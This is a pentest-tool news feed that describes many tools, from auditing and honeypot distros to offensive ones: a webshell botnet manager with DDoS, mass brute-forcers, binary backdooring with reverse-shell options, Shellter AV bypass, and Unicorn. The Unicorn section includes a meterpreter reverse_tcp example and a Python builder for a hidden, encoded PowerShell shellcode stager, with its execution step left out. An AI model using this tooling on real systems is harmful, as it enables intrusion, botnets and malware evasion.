Channel: KitPloit - PenTest Tools!

QuasiBot - Webshell Manager aka HTTP Botnet


QuasiBot is a complex webshell manager written in PHP, which operates on web-based backdoors implemented by the user. Using prepared PHP backdoors, quasiBot works as a C&C, trying to communicate with each backdoor. The tool goes beyond average web-shell managers, since it delivers useful functions for scanning, exploiting and so on. It is a quasi-HTTP botnet, hence the name.

All data about bots is stored in an SQL database; at the moment only MySQL is supported. A TOR proxy is also supported: the goal was to create a secure connection between the C&C and the backdoors, and using SOCKS5 it is able to torify all connections between you and the web server. All configuration is stored in the config file. QuasiBot is still under construction, so I am aware of potential bugs.

You will need web server software; tested on Linux with Apache 2.2 and PHP 5.4.4.

How it works

  • quasiBot operates on web-shells delivered by the user; each backdoor is verified by an MD5 hash which changes every hour
    quasiBot (C&C) -[request/verification]-> Bots (Webshells) -[response/verification]-> quasiBot (C&C) -[request/command]-> Bots (Webshells) -[response/execution]-> quasiBot (C&C)
  • Backdoors come in two types, with and without the DDoS module; the source code is included and displayed on the home page
  • The connection between C&C and server is handled by curl; a TOR proxy is supported, and the User-Agent is randomized from an array
    quasiBot (C&C) -[PROXY/TOR]-> Bots (Webshells) <-[PROXY/TOR]- quasiBot (C&C)
  • Webshells can be removed and added in the 'Settings' tab; they are stored in the database
  • The 'RSS' tab contains the latest exploit and vulnerability feeds
  • The 'RCE' tab performs Remote Code Execution on a specific server using the selected PHP function
  • The 'Scan' tab resolves an IP or URL and performs a basic scan using nmap, dig and whois - useful in the information-gathering phase
  • The 'Pwn' tab stands for a few functions which help collect information about the server and try to find exploits for the OS version in use, using Linux Exploit Suggester
  • 'MySQL Manager', as the name says, can be used to perform basic operations on a specific database - it can be helpful when looking for config files that include MySQL connections on the remote server; it also displays some information about its environment
  • The 'Run' tab runs a specific command on every bot at once
  • The 'DDoS' tab performs UDP DoS attacks using all bots or a single one; the expanded backdoor is required
  • The whole front-end is maintained in a pleasant, functional interface

Running quasi for the first time

  • Move all files to the prepared directory and change the default settings in the config file (config.php)
  • Visiting quasiBot for the first time creates the needed database and its structure
  • In the 'Settings' tab you can add and delete shells; then you're ready to go

Todo

  • Authorization system
  • Port Linux Exploit Suggester to PHP
  • Add Windows support to the 'PWN' module
  • Automatic attacks on servers
  • Backdoor creation (backconnects)
  • Source code cleanup, it's still pretty shitty; the number of required files should be reduced
  • ???


Bing Dork Scanner - Tool to extract urls from a bing search


This is a simple script with a GUI to extract URLs from a Bing search.

Supports only HTTP proxies.

Required Perl Modules:
  • LWP
  • Gtk2
  • Glib
  • utf8
  • threads
  • threads::shared
  • URI::Escape

Sandcat Browser 5 - A Penetration-Oriented Browser


Sandcat is a lightweight multi-tabbed web browser that combines the speed and power of Chromium and Lua. Sandcat comes with built-in live headers, an extensible user interface and command line console, resource viewer, and many other features that are useful for web developers and pen-testers.

Here is what changed in version 5.0 beta 1:
  • Faster startup and responsiveness.
  • Huge refactoring and cleanup of the current code.
  • The Chromium library was upgraded to the latest release (incredibly fast!).
  • Improved compatibility with 64-bit Windows editions.
  • Improved source code editor.
  • Available as free, open source/community edition (under a BSD-3-Clause license).
  • Built using components and libraries from the Catarinka toolkit (also made open source at the same time with this release and under the same license).
  • Includes the Selenite Lua library - a multi-purpose set of Lua extensions developed to make the development of Lua extensions for Sandcat easier. The code for Selenite is now open source, under the MIT license. The library documentation is available here.
  • Fixed: output of the SHA1 and full-URL encoders that come with the pen-tester pack.

SlowHTTPTest - Application Layer DoS attack simulator


SlowHTTPTest is a highly configurable tool that simulates some Application Layer Denial of Service attacks. It works on the majority of Linux platforms, OS X and Cygwin - a Unix-like environment and command-line interface for Microsoft Windows.

It implements the most common low-bandwidth Application Layer DoS attacks, such as Slowloris, Slow HTTP POST and the Slow Read attack (based on the TCP persist timer exploit), which drain the concurrent connection pool, as well as the Apache Range Header attack, which causes very significant memory and CPU usage on the server.

Slowloris and Slow HTTP POST DoS attacks rely on the fact that the HTTP protocol, by design, requires requests to be completely received by the server before they are processed. If an HTTP request is not complete, or if the transfer rate is very low, the server keeps its resources busy waiting for the rest of the data. If the server keeps too many resources busy, this creates a denial of service. This tool sends partial HTTP requests, trying to cause a denial of service on the target HTTP server.


Oracle Password Auditor - Oracle Password Recovery & Auditing Tool



Oracle Password Auditor is free Oracle database password recovery and auditing software.

It not only helps you recover lost or forgotten Oracle database passwords but also audits an Oracle database setup in a corporate environment by discovering weak password configurations.

During the auditing operation it detects special cases such as account lockout, an incorrect Oracle SID, session limit problems etc. In such cases it stops the operation rather than blindly continuing with the errors. Penetration testers can use this feature to detect account lockout issues and further verify whether the setup is susceptible to such DDoS attacks.
It uses a simple and fast dictionary-based password recovery method. At the start it can also automatically check for well-known default user/password combinations.

It is very easy to use, with a cool GUI, and a handy tool for IT administrators and penetration testers.

It works on a wide range of platforms, from Windows XP to Windows 8.


CountryTraceRoute v1.22 - Fast Traceroute with IP country information


CountryTraceRoute is a traceroute utility similar to the tracert tool of Windows, but with a graphical user interface, and it's also much faster than Windows' tracert. CountryTraceRoute also displays the country of the owner of every IP address found in the traceroute.

After the traceroute is completed, you can select all items (Ctrl+A) and then save them into a csv/tab-delimited/html/xml file with the 'Save Selected Items' option (Ctrl+S), or copy them to the clipboard (Ctrl+C) and then paste the result into Excel or another spreadsheet application.

System Requirements

This utility works on any version of Windows, starting from Windows 2000 and up to Windows 8. Both 32-bit and x64 systems are supported.


FuckShitUp - Multi Vulnerabilities Scanner written in PHP


Basically, FSU is a bunch of tools written in PHP-CLI. Using the built-in functions, you are able to grab URLs using search engines, and so dork for interesting files and full path disclosures. Using a list of URLs, the scanner looks for Cross Site Scripting, Remote File Inclusion, SQL Injection and Local File Inclusion vulnerabilities. It is able to perform mass bruteforce attacks on a specific range of hosts, or bruteforce SSH with a specific username taken from an FPD. Whenever something interesting is found, such as a vulnerability or broken auth credentials, the data is saved in .txt files - just like the URLs and any other files. FSU is based on PHP and text files; it's still under construction, so I am aware of potential bugs. The principle of operation is simple:
more URLs -> more vulns. For educational purposes only.

Intro

  • Data grabbing:
    • URLs (geturl/massurl) -> (scan)
    • Configs, databases, SQLi (dork)
    • Full Path Disclosures / users (fpds) -> (brutefpds)
    • Top websites info (top)
  • Massive scanning
    • XSS, SQLi, LFI, RFI (scan)
    • FTP, SSH, DBs, IMAP (multibruter)
    • Accurate SSH bruteforce (brutefpds)

Plan

  • Web Apps
    • Grab URLs via 'geturl' or 'massurl' (massurl requires a list of tags as a file)
    • Scan URL parameters for vulns with 'scan'
  • Servers
    • Pick a target, get the IP range
    • Scan for services on each IP and bruteforce with 'multibruter'
    • Grab full path disclosures, and thereby Linux usernames
    • Perform SSH bruteforce for a specific user with 'brutefpds'
  • Info grabbing
    • Use 'dork' for automatic dorking
    • Use 'fpds' for full path disclosure grabbing
    • Use 'search' for searching for someone in your databases
    • Use 'top' for scanning all top websites of a specific nation
  • Others
    • 'Stat' shows current statistics and information
    • 'Show' displays a specific file
    • 'Clear' and 'filter' - remove duplicates, remove blacklisted URLs

Others

MultiBruter requirements (php5):
  • php5-mysql - for mysql connections
  • php5-pgsql - for postgresql connections
  • libssh2-php - for ssh connections
  • php5-sybase - for mssql connections
  • php5-imap - for imap connections

TODO:
  • Fix problems with grabbing large amounts of URLs
  • More search engines
  • SQL Injector
  • RFI shell uploader
  • FSU is not as secure as it should be

Lynis 1.5.9 - Security auditing tool for Unix/Linux systems


Lynis is an open source security auditing tool. Its primary goal is to help users with auditing and hardening Unix and Linux based systems. The software is very flexible and runs on almost every Unix based system (including Mac). Even installation of the software itself is optional!

How it works

Lynis performs hundreds of individual tests to determine the security state of the system. Many of these tests are also part of common security guidelines and standards. Examples include searching for installed software and determining possible configuration flaws. Lynis goes further and also tests individual software components, checks related configuration files and measures performance. After these tests, a scan report is displayed with all discovered findings.

Typical use cases for Lynis:
  • Security auditing
  • Vulnerability scanning
  • System hardening

Why open source?

Open source software provides trust by letting people look into the code. Adjustments are easily made, providing you with a flexible solution for your business. But can you trust systems and software with your data? Lynis gives you this confidence. It does so with extensive auditing of your systems. This way you can verify and stay in control of your security needs.


System Auditing

Auditing made easy

With IT departments already under pressure, the demand for securing systems is only getting higher. This is why regular system auditing is required.
Unfortunately, manual checking is too much work and most solutions only present the issues. With Lynis Enterprise, auditing is quick, easy and affordable.

Extensive

Audits performed by Lynis are extensive. From the bootloader up to the last piece of software, it all gets checked. Any vulnerable package, weak configuration value or unneeded daemon will show up sooner or later.

System Hardening

Limiting the weak spots

To increase the defenses of a system, additional security measures have to be implemented. This process of fortification is called system hardening. It consists of removing unnecessary parts, limiting default access and tightening the permissions of processes and users. While Unix based systems are fairly secure by default, the need for system hardening will always exist.
Hardening systems without the right tools can take a lot of time. Besides investigating, the changes have to be planned, implemented and tested at several stages.

Auditing and Hardening

Our solution performs an in-depth audit to determine the applicable hardening controls. Together with these controls, the right suggestions are selected for your environment. A customized plan becomes part of your system hardening efforts. To simplify the process of system hardening, hardening snippets are provided. Almost as simple as a copy-paste, you can harden your workstations and servers.

Technical details

The hardening snippets used depend on the related control. Usually there is a piece of shell script available to test for a specific control, or to implement it. Where possible and applicable, snippets are also provided for configuration management tools like cfengine, Chef and Puppet.

Vulnerability Scanning

Weaknesses

Discovering weaknesses in IT security is called vulnerability scanning. It is the art of finding weaknesses before malicious people do. These vulnerabilities may exist in essential parts of the operating system, in software, or even in configuration files.

Best of all worlds

Our solution focuses on host-based scanning, combined with scanning via the network. This way more ground is covered and better insights can be provided. Solutions using only network scanning are nowadays not extensive enough.
Most of the vulnerability tests are built in. With the help of plugins, additional tests are performed to discover vulnerabilities. Information is also collected which can be used to determine weaknesses in unexpected areas.


BackdoorFactory - Patch PE (x86/x64) and ELF (x86/x64 and ARM LE x32) binaries with shellcode


Patch win86/64 PE and linux86/64 binaries with shellcode. The goal of The Backdoor Factory is to patch executable binaries with user-desired shellcode while continuing the normal execution of the binary as in its prepatched state. Under a BSD 3-Clause License.

This is done by either appending a code cave or using existing code caves of the executable. This project includes several customized Metasploit shellcodes, plus a new shellcode, loadliba_reverse_tcp, designed to bypass all the protections of EMET 4.1. The user can also provide their own shellcode.

This update provides the loadliba_reverse_tcp shellcode, stability fixes, and speed improvements.

Usage: backdoor.py [options]

Options:
  -h, --help            show this help message and exit
  -f FILE, --file=FILE  File to backdoor
  -s SHELL, --shell=SHELL
                        Payloads that are available for use.
  -H HOST, --hostip=HOST
                        IP of the C2 for reverse connections
  -P PORT, --port=PORT  The port to either connect back to for reverse shells
                        or to listen on for bind shells
  -J, --cave_jumping    Select this option if you want to use code cave
                        jumping to further hide your shellcode in the binary.
  -a, --add_new_section
                        Mandating that a new section be added to the exe
                        (better success) but less AV avoidance
  -U SUPPLIED_SHELLCODE, --user_shellcode=SUPPLIED_SHELLCODE
                        User supplied shellcode, make sure that it matches the
                        architecture that you are targeting.
  -c, --cave            The cave flag will find code caves that can be used
                        for stashing shellcode. This will print all the
                        code caves of a specific size. The -l flag can be used
                        with this setting.
  -l SHELL_LEN, --shell_length=SHELL_LEN
                        For use with -c to help find code caves of different
                        sizes
  -o OUTPUT, --output-file=OUTPUT
                        The backdoor output file
  -n NSECTION, --section=NSECTION
                        New section name must be less than seven characters
  -d DIR, --directory=DIR
                        This is the location of the files that you want to
                        backdoor. You can make backdooring a directory of files
                        faster by forcing the attaching of a code cave to the
                        exe by using the -a setting.
  -w, --change_access   This flag changes the section that houses the code cave
                        to RWE. Sometimes this is necessary. Enabled by
                        default. If disabled, the backdoor may fail.
  -i, --injector        This command turns the backdoor factory into a hunt and
                        shellcode inject type of mechanism. Edit the target
                        settings in the injector module.
  -u SUFFIX, --suffix=SUFFIX
                        For use with injector, places a suffix on the original
                        file for easy recovery
  -D, --delete_original
                        For use with injector module. This command deletes
                        the original file. Not for use in production systems.
                        *Author not responsible for stupid uses.*
  -O DISK_OFFSET, --disk_offset=DISK_OFFSET
                        Starting point on disk offset, in bytes. Some authors
                        want to obfuscate their on-disk offset to avoid
                        reverse engineering; if you find one of those files,
                        use this flag after you find the offset.
  -S, --support_check   To determine if the file is supported by BDF prior to
                        backdooring the file. For use by itself or with
                        verbose. This check happens automatically if
                        backdooring is attempted.
  -M, --cave-miner      Future use, to help determine the smallest shellcode
                        possible in a PE file
  -q, --no_banner       Kills the banner.
  -v, --verbose         For debug information output.
  -T IMAGE_TYPE, --image-type=IMAGE_TYPE
                        ALL, x32, or x64 type binaries only. Default=ALL
  -Z, --zero_cert       Allows for the overwriting of the pointer to the PE
                        certificate table, effectively removing the certificate
                        from the binary for all intents and purposes.
  -R, --runas_admin     Checks the PE binaries for 'requestedExecutionLevel
                        level="highestAvailable"'. If this string is included
                        in the binary, it must run as system/admin. Doing this
                        slows patching speed significantly.
  -L, --patch_dll       Use this setting if you DON'T want to patch DLLs.
                        Patches by default.

Features:

PE Files

Can find all code caves in an EXE/DLL.
By default, clears the pointer to the PE certificate table, thereby unsigning the binary.
Can inject shellcode into code caves or into a new section.
Can find out if a PE binary needs to run with elevated privileges.
When selecting code caves, you can use the following commands:
-Jump (j), for code cave jumping
-Single (s), for patching all your shellcode into one cave
-Append (a), for creating a code cave
-Ignore (i), never mind, ignore this binary
Can ignore DLLs.

ELF Files

Extends the TEXT segment by 1000 bytes and injects shellcode into that section of code.

Overall

The user can:
-Provide custom shellcode.
-Patch a directory of executables/DLLs.
-Select only x32 or x64 binaries to patch.
-Include BDF in other Python projects; see pebin.py and elfbin.py


VNCPassView - Recover the passwords stored by VNC


VNCPassView is a small utility that recovers the passwords stored by the VNC tool. It can recover two kinds of passwords: the password stored for the current logged-on user (HKEY_CURRENT_USER in the Registry), and the password stored for all users.

Using VNCPassView

This utility doesn't require any installation process or additional DLLs. Just run the executable file (VNCPassView.exe), and the VNC passwords will be displayed, if they are stored on your computer.


Facebook Password Remover - All-in-one Facebook Login Password Removal Tool


Facebook Password Remover is the free all-in-one tool to quickly remove the stored Facebook Login passwords from your system.

This helps you delete any accidentally (or otherwise) stored Facebook password on public/shared computers so that your Facebook account remains safe.

Currently it supports Facebook password removal from the following applications:
  • Firefox
  • Internet Explorer [v7.x - v10.x]
  • Google Chrome
  • Google Chrome Canary/SXS
  • CoolNovo Browser
  • Opera Next
  • Comodo Dragon Browser
  • SeaMonkey Browser
  • SRWare Iron Browser
  • Flock Browser
One of the unique features of this tool is that it allows you to remove even encrypted Facebook passwords belonging to any user account, either on the local system or on another computer.

Before removing the passwords, you can also back up the recovered Facebook password list in HTML/XML/TEXT format.

Facebook Password Remover is fully portable and works on both 32-bit and 64-bit platforms from Windows XP to Windows 8.


Features
  • Instantly decrypts and shows all the Facebook passwords on your system
  • Removes either selected ones or all the stored Facebook passwords with just a click
  • Supports recovery and removal from the latest versions of the applications
  • Creates a backup password report in HTML/XML/TEXT format
  • Auto-detects the current password store location
  • Removes passwords from any user account on the local or another system
  • Removes even encrypted Facebook passwords
  • Free and easy-to-use GUI-based tool
  • Fully portable; can be run anywhere without Java or .NET components
  • Includes an installer for local installation and uninstallation


DomainHostingView v1.61 - Show domain hosting information


DomainHostingView is a utility for Windows that collects extensive information about a domain by using a series of DNS and WHOIS queries, and generates an HTML report that can be displayed in any Web browser.

The information displayed in the DomainHostingView report includes: the hosting company or data center that hosts the Web server, mail server, and domain name server (DNS) of the specified domain, the created/changed/expiry dates of the domain, the domain owner, the domain registrar that registered the domain, a list of all DNS records, and more...

Features

  • DomainHostingView is a Unicode application and thus it can properly display WHOIS records containing non-English characters.
  • DomainHostingView supports Internationalized Domain Names (IDN). When you type a domain with non-English characters, DomainHostingView automatically converts it into a format that can be used with the WHOIS and DNS servers.
  • DomainHostingView parses the text returned by the WHOIS servers, extracts the important data, and displays it in an easy-to-read summary.
  • DomainHostingView also displays the raw text returned by the WHOIS servers, with a small enhancement - every http link is displayed as a clickable link that opens the Web page in a new window.

Start Using DomainHostingView

DomainHostingView doesn't require any installation process or additional DLL files. In order to start using it, simply run the executable file - DomainHostingView.exe
Below the menu and the toolbar of DomainHostingView, type the domain that you want to inspect, and then click the 'Go' button or press F9. Be aware that you should type only the domain name, without the www prefix of the Web site.
After you press F9, wait 2 - 15 seconds for the information about the specified domain to be collected. When DomainHostingView finishes collecting the domain information, the report is displayed in the main window, and you can use 'Save HTML Report' to save the report to a file.

About The Domain Report of DomainHostingView

Here's a description of every section in the DomainHostingView report:
  • Summary Information: In this section, you get a summary of the information extracted from the DNS and WHOIS queries:
    • Domain is registered with... Specifies the domain registrar that registered the domain (like GoDaddy, NetworkSolutions, and others).
    • Domain is registered to... The owner of the domain. If the domain is protected by a privacy service, DomainHostingView specifies that the name you see is not the real domain owner.
    • Web site is hosted by... Specifies the name of the hosting company or data center that hosts the Web site of this domain.
    • Mail Server is hosted by... Specifies the name of the hosting company or data center that hosts the mail server of this domain. For some domains, Web site and mail services are hosted on the same server, while others use different hosting companies for Web site and email services. For example, many companies use Google's Gmail service to send and receive all their emails, while their Web site is hosted by another hosting company.
    • Domain Name Server (DNS) is hosted by... Specifies the name of the hosting company or data center that hosts the DNS server of this domain. For some domains, the Web site and DNS server are hosted by the same company, while others use a separate DNS hosting service.
    • Domain was created on... Specifies the date that the domain was created.
    • Domain was last updated on... Specifies the date that the domain was last updated.
    • Domain expires on... Specifies the date that the domain expires.
    • Web site is hosted on... Specifies whether the Web site is hosted on a Linux/Unix or Windows server. (In order to get this information, DomainHostingView sends a simple HTTP query to the server and parses the server response.)
    Be aware that some of the above fields are displayed only for some domains.
  • DNS Records: In this section, you get a table with all major DNS records (MX, A, NS, SOA) that can be extracted for the specified domain. For every IP address found in the other DNS records, DomainHostingView also extracts the PTR record (reverse DNS lookup).
  • Subdomains: This section won't be displayed for most domains, because most DNS servers block the ability to extract the subdomains of a domain. If DomainHostingView manages to extract the subdomain list from the DNS server, it is displayed in a simple table with the IP address and subdomain string.
  • IP Addresses Information: This section provides a table with IP address information for the hosting company or data center that hosts the Web site, the mail server, and the domain name server.
  • Raw Domain Information: This section provides the raw text returned from the WHOIS query of the domain.
  • Web Server IP Address Information: This section provides the raw text returned from the WHOIS query of the Web server IP address.
  • Mail Server IP Address Information: This section provides the raw text returned from the WHOIS query of the mail server IP address.
  • Name Server IP Address Information: This section provides the raw text returned from the WHOIS query of the domain name server IP address.

Web-Fu - Chrome extension for pentesting web applications


Chrome extension for pentesting web applications. Web-fu is a web hacking tool focused on discovering and exploiting web vulnerabilities.

It is a browser-embedded web hacking tool. Some tools don't support certificate authentication or web VPN access. If the browser can authenticate to the application for inside scanning, this hacking tool can too, because it is embedded.

A very comfortable way of auditing websites.

Main functionalities:

 - visual web crawling
 - visual form cracking
 - get/post bruteforcing and fuzzing
 - real rendering
 - Gauss-based false positive reductor
 - encoding/decoding
 - portscan
 - cookie editor
 - web notes
 - request interceptor
 - http logger
 - vulnerability scanner
 - build request
 - session locker
 - exploit multi-search

With Web-fu, you will do the best web site pentest and vulnerability assessment.


HoneyDrive 3 - The Premier Honeypot Linux Distro


HoneyDrive is the premier honeypot Linux distro. It is a virtual appliance (OVA) with the Xubuntu Desktop 12.04.4 LTS edition installed. It contains over 10 pre-installed and pre-configured honeypot software packages such as the Kippo SSH honeypot, the Dionaea and Amun malware honeypots, the Honeyd low-interaction honeypot, the Glastopf web honeypot and Wordpot, the Conpot SCADA/ICS honeypot, the Thug and PhoneyC honeyclients and more. Additionally it includes many useful pre-configured scripts and utilities to analyze, visualize and process the data it can capture, such as Kippo-Graph, Honeyd-Viz, DionaeaFR, an ELK stack and much more. Lastly, almost 90 well-known malware analysis, forensics and network monitoring tools are also present in the distribution.

FEATURES:

  • Virtual appliance based on Xubuntu 12.04.4 LTS Desktop.
  • Distributed as a single OVA file, ready to be imported.
  • Full LAMP stack installed (Apache 2, MySQL 5), plus tools such as phpMyAdmin.
  • Kippo SSH honeypot, plus Kippo-Graph, Kippo-Malware, Kippo2MySQL and other helpful scripts.
  • Dionaea malware honeypot, plus DionaeaFR and other helpful scripts.
  • Amun malware honeypot, plus helpful scripts.
  • Glastopf web honeypot, along with Wordpot WordPress honeypot.
  • Conpot SCADA/ICS honeypot.
  • Honeyd low-interaction honeypot, plus Honeyd2MySQL, Honeyd-Viz and other helpful scripts.
  • LaBrea sticky honeypot, Tiny Honeypot, IIS Emulator and INetSim.
  • Thug and PhoneyC honeyclients for client-side attack analysis, along with the Maltrieve malware collector.
  • ELK stack: ElasticSearch, Logstash, Kibana for log analysis and visualization.
  • A full suite of security, forensics and anti-malware tools for network monitoring, malicious shellcode and PDF analysis, such as ntop, p0f, EtherApe, nmap, DFF, Wireshark, Recon-ng, ClamAV, ettercap, MASTIFF, Automater, UPX, pdftk, Flasm, Yara, Viper, pdf-parser, Pyew, Radare2, dex2jar and more.
  • Firefox add-ons pre-installed, plus extra helpful software such as GParted, Terminator, Adminer, VYM, Xpdf and more.

HoneyDrive 3 RELEASE NOTES:

1) HoneyDrive 3 has been created entirely from scratch. It is based on the Xubuntu Desktop 12.04.4 LTS edition and is distributed as a standalone OVA file that can be easily imported as a virtual machine using virtualization software such as VirtualBox and VMware.
2) All the honeypot programs from the previous version of HoneyDrive are included, and they have also been upgraded to their latest versions and converted almost entirely to cloned git repos for easier maintenance and updating. This latter fact on its own could be considered reason enough to release the new version.
3) Many new honeypot programs have been installed that really make HoneyDrive 3 “complete” in terms of honeypot technology, plus around 50(!) new security related tools in the fields of malware analysis, forensics and network monitoring.
4) The main honeypot software packages and BruteForce Lab’s projects reside in /honeydrive. The rest of the programs reside in /opt. The location of all software can be found inside the README.txt file on the desktop.
5) HoneyDrive 3 doesn’t make itself as known to the outside world as the previous version. There are no descriptive messages and, apart from Kippo-Graph and Honeyd-Viz, every other piece of software is not accessible from the outside (unless you configure them otherwise, or even lock down Kippo-Graph and Honeyd-Viz as well).
A note on versioning: previous versions of HoneyDrive started with a zero (0.1 and 0.2), which seemed confusing to some. I didn’t like it either and in the end I decided to “renumber” those as versions 1 and 2, essentially making this new version HoneyDrive 3, i.e. the third official release.

FREQUENTLY ASKED QUESTIONS:

  1. Why use HoneyDrive?
    HoneyDrive saves you time! It has all the major honeypot-related software pre-installed and pre-configured to work out of the box (or with some configuration options of your liking). As I have seen many times in comments or support requests I get, setting up a honeypot system is not always easy. This is especially true for new infosec enthusiasts or sysadmins and “hard” to set up software like Dionaea, for example.
  2. What utilities and software are included in HoneyDrive?
    HoneyDrive contains all the major honeypot-related software and a ton more useful tools. For a complete list you’ll have to take a look at the README.txt file included in the virtual appliance (you’ll find it on the desktop) or online at the downloads section of SourceForge (link above).
  3. Why isn’t [insert-name-here] included in HoneyDrive?
    Unfortunately I can’t keep track of every different piece of software. But, I’m very open to suggestions about HoneyDrive! If you know a tool that could be of benefit please let me know by leaving a comment on this page and it will be included in the next release of HoneyDrive.
  4. What is the password for [insert-name-here]?
    Again, your best bet is reading the README.txt file included in the virtual appliance or found online at the downloads section of SourceForge (link above). Every password you will need is included in its appropriate section.

CHANGELOG:

HoneyDrive 3
  • Upgraded ALL existing honeypot software to the corresponding latest versions.
  • Converted ALL existing honeypot software to cloned git repos for easier maintenance.
  • Removed distinguishable HoneyDrive artifacts and secured access to web tools.
  • Added Kippo-Malware and Kippo2ElasticSearch.
  • Added Conpot SCADA/ICS honeypot.
  • Added PhoneyC honeyclient.
  • Added maltrieve malware downloader.
  • Added the ELK stack (ElasticSearch, Logstash, Kibana).
  • Added the following security tools: dnstop, MINI DNS Server, dnschef, The Sleuth Kit + Autopsy, TekCollect, hashMonitor, corkscrew, cryptcat, socat, hexdiff, pdfid, disitool, exiftool, Radare2, chaosreader, netexpect, tcpslice, mitmproxy, mitmdump, Yara, Recon-ng, SET (Social-Engineer Toolkit), MASTIFF + MASTIFF2HTML, Viper, Minibis, Nebula, Burp Suite, xxxswf, extract_swf, Java Decompiler (JD-GUI), JSDetox, extractscripts, AnalyzePDF, peepdf, officeparser, DensityScout, YaraGenerator, IOCExtractor, sysdig, Bytehist, PackerID, RATDecoders, androwarn, passivedns, BPF Tools, SpiderFoot, hashdata, LORG.
  • Added the following extra software: 7zip, Sagasu.
  • Added the following Firefox add-ons: Disconnect, Undo Closed Tabs Button, PassiveRecon.
  • Removed the following software: Kojoney, mwcrawler, Vidalia, ircd-hybrid, DNS Query Tool, DNSpenTest, VLC, Parcellite, Open Penetration Testing Bookmarks Collection (Firefox).

Unicorn - Tool for using a PowerShell downgrade attack and inject shellcode straight into memory

Magic Unicorn is a simple tool for performing a PowerShell downgrade attack and injecting shellcode straight into memory. It is based on Matthew Graeber's PowerShell attacks and the PowerShell bypass technique presented by David Kennedy (TrustedSec) and Josh Kelly at Defcon 18.

Usage is simple: run Magic Unicorn (ensure Metasploit is installed and in the right path) and it will automatically generate a PowerShell command. Cut and paste that command into a command-line window, or deliver it through a payload delivery system.

root@bt:~/Desktop# python unicorn.py
(ASCII-art unicorn banner omitted)

Unicorn is a PowerShell injection tool utilizing Matthew Graeber's attack, expanded to automatically downgrade the process if a 64-bit platform is detected. This is useful in order to ensure that a payload can be delivered with just one set of shellcode instructions. It works on any version of Windows with PowerShell installed. Simply copy and paste the output and wait for the shells.

Usage:
python unicorn.py payload reverse_ipaddr port

Example: python unicorn.py windows/meterpreter/reverse_tcp 192.168.1.5 443
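The two layers the description above relies on, as an added example that is not Unicorn's own code: PowerShell's -EncodedCommand takes base64 of the UTF-16LE script text, and the 64-bit downgrade is a check on [IntPtr]::Size that re-launches the encoded script under the 32-bit interpreter. The same encoding run backwards is what a defender does with a logged command line, so the block also recovers the embedded byte array from one. The wrapper shape, the syswow64 path and the sample bytes are assumptions; the VirtualAlloc/CreateThread lines that would actually execute the bytes are deliberately left out.

```python
import base64
import re

# Constructed placeholder bytes standing in for x86 shellcode; not a real payload.
SAMPLE_SHELLCODE = bytes(range(0x10))

# Assumed location of the 32-bit interpreter on a 64-bit Windows host (WOW64).
PS32 = r"$env:windir\syswow64\windowspowershell\v1.0\powershell.exe"


def encode_powershell(script: str) -> str:
    """-EncodedCommand expects base64 of the script as UTF-16LE, not UTF-8."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_powershell(blob: str) -> str:
    return base64.b64decode(blob).decode("utf-16-le")


def build_stager(shellcode: bytes) -> str:
    """Script body carrying the shellcode as a PowerShell [Byte[]] literal.
    Only the array is emitted; the memory-allocation and thread-start lines
    that would execute it are intentionally omitted from this example."""
    arr = ",".join(f"0x{b:02x}" for b in shellcode)
    return f"[Byte[]]$sc = {arr};"


def build_command(shellcode: bytes) -> str:
    """Assumed wrapper shape: when [IntPtr]::Size reports a 64-bit process,
    re-launch under the 32-bit interpreter so one x86 blob works everywhere."""
    enc = encode_powershell(build_stager(shellcode))
    return (
        "powershell -nop -w hidden -c "
        f'"if([IntPtr]::Size -eq 8){{& {PS32} -nop -w hidden -enc {enc}}}'
        f'else{{powershell -nop -w hidden -enc {enc}}}"'
    )


# Defender side: find -enc/-e/-EncodedCommand blobs in a logged command line.
_ENC_RE = re.compile(r"-(?:encodedcommand|enc|e)\s+([A-Za-z0-9+/=]+)", re.I)
_BYTES_RE = re.compile(r"\[Byte\[\]\]\$\w+\s*=\s*([0-9a-fA-Fx,]+)")


def extract_shellcode(command_line: str) -> bytes:
    """Decode each encoded blob and return the first [Byte[]] array found."""
    for m in _ENC_RE.finditer(command_line):
        try:
            script = decode_powershell(m.group(1))
        except (ValueError, UnicodeDecodeError):
            continue
        arr = _BYTES_RE.search(script)
        if arr:
            return bytes(int(x, 16) for x in arr.group(1).split(","))
    raise ValueError("no encoded command carrying a [Byte[]] array found")


if __name__ == "__main__":
    cmd = build_command(SAMPLE_SHELLCODE)
    print(cmd)
    print(extract_shellcode(cmd).hex())
```

Run it to see the one-liner and the recovered bytes; feed extract_shellcode() a Sysmon or 4688 command line to pull the array out of a real capture.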



Shellter v1.7 - Dynamic ShellCode Injector Tool


Shellter is a dynamic shellcode injection tool, and probably the first dynamic PE infector ever created.

It can be used in order to inject shellcode into native Windows applications (currently 32-bit apps only).

The shellcode can be something yours or something generated through a framework, such as Metasploit.

Shellter takes advantage of the original structure of the PE file and doesn’t apply any modification such as changing memory access permissions in sections (unless the user chooses to, or selects Basic Mode), adding an extra section with RWE access, or anything else that would look dodgy under an AV scan.

Shellter uses a unique dynamic approach which is based on the execution flow of the target application.

How does it work?

This means that no static/predefined locations are used for shellcode injection. Shellter launches and traces the target while logging the execution flow of the application.

What does it trace?

Shellter traces the entire execution flow that occurs in userland. That means code inside the target application itself (the PE image), and code outside of it that might be in a system DLL, on a heap, etc. This ensures that functions that actually belong to the target executable, but are only used as callback functions for Windows APIs, are not missed.

However, the tracing engine will not log any instructions that are not in the memory range of the PE image of the target application, since these cannot be used as a reference to permanently inject the shellcode.

Why do I need Shellter?
Bypass AVs.

Executables created through Metasploit are most likely detected by most AV vendors. By using Shellter, you automatically have an infinitely polymorphic executable template, since you can use any 32-bit ‘standalone’ native Windows executable to host your shellcode. ‘Standalone’ means an executable that doesn’t need any proprietary DLLs, apart from the system DLLs, to load and run. For example, notepad.exe, many other applications you can find online, or templates you create yourself.

You can also use applications that make use of proprietary DLLs if those are not required to create the process in the first place, and are normally loaded later on if needed to execute code for a specific task. In case you select an application that needs one or more proprietary DLLs to create the process in the first place then you will have to include them in the same directory from where you load the main executable. However, this is not recommended since it is more convenient to have just a single executable to upload to the target.

What types of apps can I use?

You can basically use any 32-bit standalone (see above) native Windows application. Of course, since the main goal is to bypass an AV, you should always avoid packed applications, or generally applications that have ‘dodgy’ characteristics such as sections with RWE permissions, more than one section containing executable code, etc.

Another reason why you should avoid packed applications is because advanced packers will also check for modifications of the file, so you will probably just break it. Advanced packers also perform various anti-reversing tricks which will detect Shellter’s debugging engine during tracing. If you are a lover of packers, you can first perform the injection and then pack the application with the packer of your choice.

